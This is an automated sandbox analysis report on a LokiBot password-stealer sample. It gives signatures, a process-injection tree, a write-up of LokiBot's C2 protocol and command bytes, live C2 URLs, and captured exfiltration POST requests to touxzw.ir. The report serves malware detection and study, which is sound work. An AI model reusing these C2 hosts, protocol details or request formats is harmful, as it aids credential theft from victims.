Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TXzf0xX2uq.exe

Overview

General Information

Sample name:TXzf0xX2uq.exe
renamed because original name is a hash value
Original sample name:5cb3d5d5e66657ffe6aa4b6819b8f885364a801c01353369f2fbc37a81d250ce.exe
Analysis ID:1634548
MD5:d6cbda717ae7addf9b583718998ae15a
SHA1:cbd764261f18b1b88de0c6af3ac08cc7642621a1
SHA256:5cb3d5d5e66657ffe6aa4b6819b8f885364a801c01353369f2fbc37a81d250ce
Tags:exeLokiuser-adrian__luca
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Lokibot
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected aPLib compressed binary
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • TXzf0xX2uq.exe (PID: 8516 cmdline: "C:\Users\user\Desktop\TXzf0xX2uq.exe" MD5: D6CBDA717AE7ADDF9B583718998AE15A)
    • svchost.exe (PID: 8532 cmdline: "C:\Users\user\Desktop\TXzf0xX2uq.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.1371818090.0000000004C00000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            Click to see the 20 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.TXzf0xX2uq.exe.1ec0000.1.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              0.2.TXzf0xX2uq.exe.1ec0000.1.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                0.2.TXzf0xX2uq.exe.1ec0000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.TXzf0xX2uq.exe.1ec0000.1.raw.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                  • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                  0.2.TXzf0xX2uq.exe.1ec0000.1.raw.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                  • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                  Click to see the 24 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Uncommon Svchost Parent Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\TXzf0xX2uq.exe", CommandLine: "C:\Users\user\Desktop\TXzf0xX2uq.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\TXzf0xX2uq.exe", ParentImage: C:\Users\user\Desktop\TXzf0xX2uq.exe, ParentProcessId: 8516, ParentProcessName: TXzf0xX2uq.exe, ProcessCommandLine: "C:\Users\user\Desktop\TXzf0xX2uq.exe", ProcessId: 8532, ProcessName: svchost.exe
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\TXzf0xX2uq.exe", CommandLine: "C:\Users\user\Desktop\TXzf0xX2uq.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\TXzf0xX2uq.exe", ParentImage: C:\Users\user\Desktop\TXzf0xX2uq.exe, ParentProcessId: 8516, ParentProcessName: TXzf0xX2uq.exe, ProcessCommandLine: "C:\Users\user\Desktop\TXzf0xX2uq.exe", ProcessId: 8532, ProcessName: svchost.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-11T01:19:33.394575+010020243121A Network Trojan was detected192.168.2.549708104.21.64.180TCP
                  2025-03-11T01:19:34.334309+010020243121A Network Trojan was detected192.168.2.549709104.21.64.180TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-11T01:19:32.642770+010020253811Malware Command and Control Activity Detected192.168.2.549708104.21.64.180TCP
                  2025-03-11T01:19:33.564117+010020253811Malware Command and Control Activity Detected192.168.2.549709104.21.64.180TCP
                  2025-03-11T01:19:34.413798+010020253811Malware Command and Control Activity Detected192.168.2.549710104.21.64.180TCP
                  2025-03-11T01:19:35.808325+010020253811Malware Command and Control Activity Detected192.168.2.549711104.21.64.180TCP
                  2025-03-11T01:19:36.839406+010020253811Malware Command and Control Activity Detected192.168.2.549712104.21.64.180TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-11T01:19:35.168422+010020243131Malware Command and Control Activity Detected192.168.2.549710104.21.64.180TCP
                  2025-03-11T01:19:36.510599+010020243131Malware Command and Control Activity Detected192.168.2.549711104.21.64.180TCP
                  2025-03-11T01:19:37.583171+010020243131Malware Command and Control Activity Detected192.168.2.549712104.21.64.180TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-11T01:19:35.168422+010020243181Malware Command and Control Activity Detected192.168.2.549710104.21.64.180TCP
                  2025-03-11T01:19:36.510599+010020243181Malware Command and Control Activity Detected192.168.2.549711104.21.64.180TCP
                  2025-03-11T01:19:37.583171+010020243181Malware Command and Control Activity Detected192.168.2.549712104.21.64.180TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-11T01:19:32.642770+010020216411A Network Trojan was detected192.168.2.549708104.21.64.180TCP
                  2025-03-11T01:19:33.564117+010020216411A Network Trojan was detected192.168.2.549709104.21.64.180TCP
                  2025-03-11T01:19:34.413798+010020216411A Network Trojan was detected192.168.2.549710104.21.64.180TCP
                  2025-03-11T01:19:35.808325+010020216411A Network Trojan was detected192.168.2.549711104.21.64.180TCP
                  2025-03-11T01:19:36.839406+010020216411A Network Trojan was detected192.168.2.549712104.21.64.180TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-11T01:19:32.642770+010028257661Malware Command and Control Activity Detected192.168.2.549708104.21.64.180TCP
                  2025-03-11T01:19:33.564117+010028257661Malware Command and Control Activity Detected192.168.2.549709104.21.64.180TCP
                  2025-03-11T01:19:34.413798+010028257661Malware Command and Control Activity Detected192.168.2.549710104.21.64.180TCP
                  2025-03-11T01:19:35.808325+010028257661Malware Command and Control Activity Detected192.168.2.549711104.21.64.180TCP
                  2025-03-11T01:19:36.839406+010028257661Malware Command and Control Activity Detected192.168.2.549712104.21.64.180TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: TXzf0xX2uq.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: http://touxzw.ir/tking3/five/fre.phpAvira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 0.2.TXzf0xX2uq.exe.1ec0000.1.raw.unpackMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
                  Multi AV Scanner detection for submitted file
                  Source: TXzf0xX2uq.exeReversingLabs: Detection: 79%
                  Source: TXzf0xX2uq.exeVirustotal: Detection: 71%Perma Link
                  Joe Sandbox ML detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: TXzf0xX2uq.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: Binary string: wntdll.pdbUGP source: TXzf0xX2uq.exe, 00000000.00000003.1297140136.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, TXzf0xX2uq.exe, 00000000.00000003.1298538833.0000000003C20000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: TXzf0xX2uq.exe, 00000000.00000003.1297140136.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, TXzf0xX2uq.exe, 00000000.00000003.1298538833.0000000003C20000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000001.00000002.1371653634.0000000000DA1000.00000020.00000001.01000000.00000004.sdmp
                  Source: Binary string: svchost.pdbUGP source: svchost.exe, 00000001.00000002.1371653634.0000000000DA1000.00000020.00000001.01000000.00000004.sdmp
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0084445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0084445A
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0084C6D1 FindFirstFileW,FindClose,0_2_0084C6D1
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0084C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0084C75C
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0084EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0084EF95
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0084F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0084F0F2
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0084F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0084F3F3
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_008437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008437EF
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00843B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00843B12
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0084BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0084BCBC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49709 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49709 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49709 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49709 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49711 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49710 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49710 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49710 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49711 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49712 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49708 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49711 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49708 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49710 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49708 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49712 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49712 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49711 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49711 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49708 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49712 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49712 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49710 -> 104.21.64.1:80
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.64.1 80Jump to behavior
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                  Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                  Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                  Source: global trafficHTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 180Connection: close
                  Source: global trafficHTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 180Connection: close
                  Source: global trafficHTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 153Connection: close
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_008522EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_008522EE
                  Source: global trafficDNS traffic detected: DNS query: touxzw.ir
                  Source: unknownHTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 180Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:19:34 GMTContent-Type: text/html; charset=iso-8859-1Connection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3O5dVyqw2w0Qrj%2FuO2SpTSi2Qh9lSVfozsLga3vizAHbTZAEbowL6UU2yiAPL%2BAF%2BqX0Ge%2F7LX5hOTJK90qe%2FNAxnkrMtN7xOXtPn3iGTHO68kD1B7yo%2FMtCsSs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e6e1893ce68ca1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1947&min_rtt=1947&rtt_var=973&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=421&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6b 69 6e 67 33 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tking3/five/fre.php was not found on this server.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:19:35 GMTContent-Type: text/html; charset=iso-8859-1Connection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L8tYINXp75JzM4a8Zd%2B88WncoXQtLpiRaZEz1kLquyIsT595WlFZhizVvI%2BBut%2BrKCEQBhKoxN4F6mgnP7i5JKkORjRf9ExVPraok9XJKfx6EOOl1WQ%2BooDuVAE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e6e18ea8114e4d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2078&min_rtt=2078&rtt_var=1039&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=394&delivery_rate=0&cwnd=73&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6b 69 6e 67 33 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tking3/five/fre.php was not found on this server.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:19:36 GMTContent-Type: text/html; charset=iso-8859-1Connection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=65xiB1XIJSfpXkgo0RIgBAqKR2yTYeiEGmNe3hqtpY7ooJkuhIJTBx4i4kKEBEeGujIhOOUsU5ZLtVYLVZInp69Hq9btPuPhYkOZYAsAktXKuk09TQlso2%2FeBJY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e6e196fd967c6a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2251&min_rtt=2251&rtt_var=1125&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=394&delivery_rate=0&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 